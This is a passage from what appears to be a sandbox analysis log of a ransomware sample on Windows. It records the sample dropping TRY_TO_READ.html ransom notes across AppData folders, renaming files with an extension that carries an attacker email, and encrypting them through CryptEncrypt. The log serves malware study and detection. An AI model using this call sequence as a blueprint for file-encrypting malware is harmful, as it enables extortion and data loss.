lpString1=0x30a498, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" [0166.695] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0166.695] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0166.698] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0166.699] GetProcessHeap () returned 0x2e0000 [0166.699] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0166.699] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2517504) returned 1 [0166.699] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x266a00 [0166.699] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0166.699] GetProcessHeap () returned 0x2e0000 [0166.699] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0166.699] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0166.699] WriteFile (in: hFile=0x520, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0166.701] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0166.701] WriteFile (in: hFile=0x520, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0166.701] ReadFile (in: hFile=0x520, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x266a00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x266a00, lpOverlapped=0x0) returned 1 [0166.883] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb123b450, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb123b450, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1668 [0166.884] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.886] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.888] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.891] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.892] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.896] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.898] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.900] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.902] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.905] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.907] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0166.907] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0166.907] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1 [0166.907] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 57 [0166.908] GetProcessHeap () returned 0x2e0000 [0166.908] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x336dd8 [0166.908] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" [0166.908] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR" [0166.908] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0166.911] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.911] GetProcessHeap () returned 0x2e0000 [0166.911] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0166.911] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1206133) returned 1 [0166.912] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x126775 [0166.912] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0166.912] GetProcessHeap () returned 0x2e0000 [0166.912] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0166.912] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0166.912] WriteFile (in: hFile=0x524, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0166.913] WriteFile (in: hFile=0x524, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0166.913] WriteFile (in: hFile=0x524, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0166.913] ReadFile (in: hFile=0x524, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x126775, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x126775, lpOverlapped=0x0) returned 1 [0166.984] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0166.984] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0166.985] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", dwFileAttributes=0x80) returned 1 [0166.986] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 64 [0166.986] GetProcessHeap () returned 0x2e0000 [0166.986] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3a7428 [0166.986] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" [0166.986] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR" [0166.986] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0166.989] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0166.989] GetProcessHeap () returned 0x2e0000 [0166.989] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0166.989] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=108824) returned 1 [0166.989] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1a918 [0166.990] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0166.990] GetProcessHeap () returned 0x2e0000 [0166.990] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0166.990] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0166.990] WriteFile (in: hFile=0x524, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0166.992] WriteFile (in: hFile=0x524, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0166.992] WriteFile (in: hFile=0x524, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0166.992] ReadFile (in: hFile=0x524, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x1a918, lpOverlapped=0x0) returned 1 [0166.994] SetFilePointer (in: hFile=0x524, lDistanceToMove=-108824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.994] WriteFile (in: hFile=0x524, lpBuffer=0x310a968*, nNumberOfBytesToWrite=0x1a918, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x310a968*, lpNumberOfBytesWritten=0x2acf9c8*=0x1a918, lpOverlapped=0x0) returned 1 [0166.994] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb12615b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb12615b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b16a8 [0166.995] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528 [0166.997] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x528 [0167.000] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b16e8 [0167.000] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.004] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.006] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.008] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.010] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.010] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.010] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3", dwFileAttributes=0x80) returned 1 [0167.011] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3") returned 69 [0167.011] GetProcessHeap () returned 0x2e0000 [0167.011] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf0) returned 0x32f900 [0167.011] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3" [0167.011] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0167.011] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zcuzdotn3z82itnwj9.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zcuzdotn3z82itnwj9.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.015] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\zcuZdOtn3z82ItNwJ9.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\zcuzdotn3z82itnwj9.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.015] GetProcessHeap () returned 0x2e0000 [0167.015] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0167.015] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=42468) returned 1 [0167.015] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa5e4 [0167.015] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.015] GetProcessHeap () returned 0x2e0000 [0167.015] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.015] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.015] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.016] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) 